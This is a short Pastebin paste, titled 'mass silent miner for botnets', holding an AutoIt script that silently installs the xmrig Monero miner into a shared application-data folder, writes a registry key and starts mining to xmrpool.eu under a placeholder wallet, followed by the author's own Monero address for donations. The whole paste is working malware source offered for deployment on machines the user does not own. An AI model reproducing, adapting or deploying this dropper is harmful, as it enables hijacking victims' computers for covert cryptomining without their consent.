KekSec420

mass silent miner for botnets

May 20th, 2025
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.52 KB | None | 0 0
  1. #AutoIt3Wrapper_UseX64=y
  2.  
  3. $install=@AppDataCommonDir & "\"
  4. FileInstall("system.exe", "xmrig.exe")
  5. FileInstall("config.json", "config.json")
  6. FileCopy("xmrig.exe", $install)
  7. FileCopy("config.json", $install)
  8. RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MainFeature\APPDIR","Path",$install)
  9. RunWait($install&"\xmrig.exe --coin 'monero' -o xmrpool.eu:5555 -u [YOUR MONERO ADDRESS GOES HERE]-p x")
  10.  
  11. MINE IS 4AWfZUDb33KGhiAr7bvuG86fZdQeSYahVhoFdMvwKscBatcyEQL52DVP8cwTWDUEGqWgXNg9Csnv59xP1q8znDBi8tPzXBQ [Feel free to donate]
Advertisement
Add Comment
Please, Sign In to add comment